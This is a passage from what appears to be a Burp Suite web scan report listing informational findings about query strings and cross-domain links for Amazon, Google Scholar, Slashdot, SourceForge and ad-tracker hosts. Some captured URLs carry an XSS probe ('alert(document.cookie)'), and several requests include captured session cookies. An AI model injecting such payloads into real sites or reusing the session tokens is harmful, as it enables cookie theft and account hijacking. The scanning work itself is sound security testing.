Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4168
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="http://www.amazon.com/dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q&" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...

20.522. http://rcm.amazon.com/e/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rcm.amazon.com
Path:	/e/cm

Issue detail

The page was loaded from a URL containing a query string:

http://rcm.amazon.com/e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1

The response contains the following link to another domain:

http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL80_.jpg

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:07:06 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4074
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="http://www.amazon.com/dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=0313363153&adid=0YRHE24D9W6NH92FF1EW&" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...

20.523. http://rcm.amazon.com/e/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rcm.amazon.com
Path:	/e/cm

Issue detail

The page was loaded from a URL containing a query string:

http://rcm.amazon.com/e/cm?t=parenthoodcom-20&o=1&p=12&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1

The response contains the following links to other domains:

http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SX60_SY80_.jpg
http://ecx.images-amazon.com/images/I/512RttCMV1L._SX60_SY80_.jpg
http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SX60_SY80_.jpg
http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SX60_SY80_.jpg

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=12&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:12 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 6062
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="http://www.amazon.com/dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ&" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ&" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ&" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/512RttCMV1L._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ&" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...

20.524. http://rd.apmebf.com/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/pg

Issue detail

The page was loaded from a URL containing a query string:

http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net

The response contains the following link to another domain:

http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355

Request

Response

20.525. http://scholar.google.com/schhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/schhp

Issue detail

The page was loaded from a URL containing a query string:

http://scholar.google.com/schhp?hl=en&tab=ws

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=s1

Request

GET /schhp?hl=en&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=0668ce1eeaf1cc06; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=0668ce1eeaf1cc06:TM=1295884936:LM=1295884936:S=g7HdCkQFZkxkhdXl; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.526. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The page was loaded from a URL containing a query string:

http://scholar.google.com/scholar?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=ws

The response contains the following links to other domains:

http://74.125.155.132/scholar?q=cache:HLaOiE6wbq4J:scholar.google.com/+ges&hl=en&as_sdt=0,9
http://74.125.155.132/scholar?q=cache:RrtQnTpMu7IJ:scholar.google.com/+ges&hl=en&as_sdt=0,9
http://74.125.155.132/scholar?q=cache:uzBEsxjt2-oJ:scholar.google.com/+ges&hl=en&as_sdt=0,9
http://article.pubs.nrc-cnrc.gc.ca/ppv/RPViewDoc?issn=1208-6045&volume=44&issue=4&startPage=797&ab=y
http://cebp.aacrjournals.org/content/16/6/1246.full
http://direct.bl.uk/research/26/3A/RN210703158.html?source=googlescholar
http://direct.bl.uk/research/53/5D/EN002056770.html?source=googlescholar
http://jama.ama-assn.org/cgi/content/summary/141/16/1123
http://onlinelibrary.wiley.com/doi/10.1111/j.1432-1033.1991.tb16207.x/full
http://respiratory-research.com/content/2/1/33/ref
http://www.ehleringer.net/Jim/Publications/157.pdf
http://www.jstor.org/stable/2389955
http://www.ojrd.com/content/4/1/7/ref
http://www.plantphysiol.org/cgi/content/abstract/79/3/885
http://www.plantphysiol.org/cgi/reprint/79/3/885.pdf
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=s1
http://www3.interscience.wiley.com/journal/119225864/abstract

Request

GET /scholar?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=0cec68e8729aa95a; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=0cec68e8729aa95a:TM=1295884936:LM=1295884936:S=B2fSiwDbwCCll2SX; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta http-equiv="imagetoolbar" content="no"><title>ges - Google Scholar</title><style>#gbar,#guser{font-size:13px;padding
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</span> <a href="http://respiratory-research.com/content/2/1/33/ref" onmousedown="return scife_clk(this.href,'ggp','res','0')">1. Macklin CC: The pulmonary alveolar mucoid film and the pneumonocytes.</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://respiratory-research.com/content/2/1/33/ref" onmousedown="return scife_clk(this.href,'gga','gga','0')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:uzBEsxjt2-oJ:scholar.google.com/+ges&hl=en&as_sdt=0,9">Cached</a>
...[SNIP]...
<h3><a href="http://www3.interscience.wiley.com/journal/119225864/abstract" onmousedown="return scife_clk(this.href,'','res','1')">Seasonal net carbon dioxide exchange of a beech forest with the atmosphere</a>
...[SNIP]...
</span> <a href="http://cebp.aacrjournals.org/content/16/6/1246.full" onmousedown="return scife_clk(this.href,'ggp','res','2')">Phase I dose escalation pharmacokinetic study in healthy volunteers of resveratrol, a potential cancer chemopreventive agent</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://cebp.aacrjournals.org/content/16/6/1246.full" onmousedown="return scife_clk(this.href,'gga','gga','2')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/26/3A/RN210703158.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','2')">BL Direct</a>
...[SNIP]...
<h3><a href="http://jama.ama-assn.org/cgi/content/summary/141/16/1123" onmousedown="return scife_clk(this.href,'','res','3')">Some newer aspects of the management of infertility</a>
...[SNIP]...
</span> <a href="http://www.ojrd.com/content/4/1/7/ref" onmousedown="return scife_clk(this.href,'ggp','res','4')">3. Klintworth GK: The molecular genetics of the corneal dystrophies...current status.</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ojrd.com/content/4/1/7/ref" onmousedown="return scife_clk(this.href,'gga','gga','4')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:HLaOiE6wbq4J:scholar.google.com/+ges&hl=en&as_sdt=0,9">Cached</a>
...[SNIP]...
<h3><a href="http://www.plantphysiol.org/cgi/content/abstract/79/3/885" onmousedown="return scife_clk(this.href,'','res','6')">Germination, respiration, and adenylate energy charge of seeds at various oxygen partial pressures</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.plantphysiol.org/cgi/reprint/79/3/885.pdf" onmousedown="return scife_clk(this.href,'gga','gga','6')"><span class=gs_ctg2>
...[SNIP]...
<h3><a href="http://onlinelibrary.wiley.com/doi/10.1111/j.1432-1033.1991.tb16207.x/full" onmousedown="return scife_clk(this.href,'','res','7')">Kinetic studies of the variations of cytoplasmic pH, nucleotide triphosphates (31P...NMR) and lactate during normoxic and anoxic transitions in maize root tips</a>
...[SNIP]...
<h3><a href="http://www.jstor.org/stable/2389955" onmousedown="return scife_clk(this.href,'','res','8')">Hydrogen and carbon isotope ratios of selected species of a Mediterranean macchia ecosystem</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ehleringer.net/Jim/Publications/157.pdf" onmousedown="return scife_clk(this.href,'gga','gga','8')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/53/5D/EN002056770.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','8')">BL Direct</a>
...[SNIP]...
<h3><a href="http://article.pubs.nrc-cnrc.gc.ca/ppv/RPViewDoc?issn=1208-6045&volume=44&issue=4&startPage=797&ab=y" onmousedown="return scife_clk(this.href,'','res','9')">Pressure broadening of the rotational Raman lines of some simple gases</a>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:RrtQnTpMu7IJ:scholar.google.com/+ges&hl=en&as_sdt=0,9">Cached</a>
...[SNIP]...

20.527. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page was loaded from a URL containing a query string:

http://slashdot.org/bookmark.pl?url={u}&title={t}

The response contains the following links to other domains:

http://a.fsdn.com/sd/all-minified.js?T_2_5_0_305
http://a.fsdn.com/sd/core-tidied.css?T_2_5_0_305
http://b.scorecardresearch.com/p?c1=2&c2=6035546&c3=&c4=&c5=&c6=&c15=&cj=1
http://geek.net/
http://geek.net/advertising
http://geek.net/privacy-statement
http://geek.net/terms.php
http://sourceforge.net/tracker/?func=add&group_id=4421&atid=104421

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
pagemark: '12
...[SNIP]...
</title>

<link rel="stylesheet" type="text/css" media="screen, projection" href="//a.fsdn.com/sd/core-tidied.css?T_2_5_0_305" >


<script src="//a.fsdn.com/sd/all-minified.js?T_2_5_0_305" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://sourceforge.net/tracker/?func=add&group_id=4421&atid=104421">Bugs</a>
...[SNIP]...
<p>

All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2011 <a href="http://geek.net/">Geeknet, Inc.</a>
...[SNIP]...
<li><a href="http://geek.net/advertising">advertise</a>
...[SNIP]...
<li><a href="http://geek.net/terms.php">terms of service</a>
...[SNIP]...
<li><a href="http://geek.net/privacy-statement">privacy</a>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6035546&c3=&c4=&c5=&c6=&c15=&cj=1" alt="comScore2"></noscript>
...[SNIP]...

20.528. http://sourceforge.net/softwaremap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/softwaremap/

Issue detail

The page was loaded from a URL containing a query string:

http://sourceforge.net/softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/cm_aa_gn1
http://b.scorecardresearch.com/p?c1=2&c2=6035546&c3=&c4=&c5=&c6=&c15=&cj=1
http://geek.net/
http://geek.net/advertising/
http://geek.net/careers/
http://p.sf.net/sourceforge/getsupport
http://p.sf.net/sourceforge/privacy
http://p.sf.net/sourceforge/terms
http://twitter.com/sourceforge

Request

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-6
Set-Cookie: PHPSESSID=c9a0c9e1734e82873111a96cf441cae9; expires=Mon, 07-Feb-2011 16:02:35 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: lighttpd/1.4.26
Content-Length: 99039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<img src="//b.collective-media.net/seg/cm/cm_aa_gn1" width="1" height="1" />

...[SNIP]...

20.529. http://tag.admeld.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615

The response contains the following link to another domain:

http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615

Request

GET /pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d5556

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Location: http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615
Content-Length: 294
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 25 Jan 2011 01:35:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615">here</a>
...[SNIP]...

20.530. http://tags.bluekai.com/site/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/10

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=1327772520
http://cm.g.doubleclick.net/pixel?nid=bluekai&
http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL

Request

Response

20.531. http://tags.bluekai.com/site/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/10

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=874442296
http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:20:20 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=HowK8Vn+oGxsHNJo; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRae8qKFnYsHp9UWZsMXsMud/QmY7LE/yU9N7RnC6hhnmkIOa8Rw6ydiXw9y1dyxRsRfDZXw8l2kxIueN1cT/OymePiTextT5Q3IOhQKoCdceGmfNCdJUz6cTFTDN4jAjsZhO4m+VPwfZpxCIw5u2OzyxduOIwOgdHyuYcXA1DqIq0H0G7y71q8ja8uXyHrDFHmBc3EcYIHIQf7l/OeW4h9dQHrDp46Uk2f9pyF7XlOe2+8cTULSGds44Dw7Y6Ghy4i/MHwIdUxSIEaeIFsTW7TWU/oI3gyPVeI/f53n0gbGyGFel33c0J5PHI5Rm3cywBn8L9Gn4yybhd0LyFZOXIpCDFQ1SUfRVyEXWePdkBYDTlTTqkz2pY1c7Ow/5sNe8vztGdclEWUy906u9Uy==; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpp8ZPQDwk+bXF//1zcR6NiRteyREqljVVT98E2pZxmaJ1W03q3Syaj9wW7Ym1=; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0ItaSRQ2Deke/J9gwnqN+5B+jHoaAKtF4P2d2foKDUtRDyQaPSVe9yEj3CqSk395/w15thQ9B1opxy1lfcRLyrGM8ZCNJ3ORzUB5PyXPiOEscQjssxEsOku2qVQbQwQb3UO2GO9A9sp60oq5c423LFSDp/8yh8snyYqdXumQzsi1M1B9v6OKzD=; expires=Sat, 23-Jul-2011 22:20:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 22:20:20 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 337
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=874442296" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

20.532. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://translate.google.com/?hl=en&tab=wT

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.youtube.com/?hl=en&tab=T1

Request

GET /?hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:35 GMT
Expires: Mon, 24 Jan 2011 16:02:35 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=428201d6b77cb58a:TM=1295884955:LM=1295884955:S=v1HYf8Q8-p0F-B9Y; expires=Wed, 23-Jan-2013 16:02:35 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

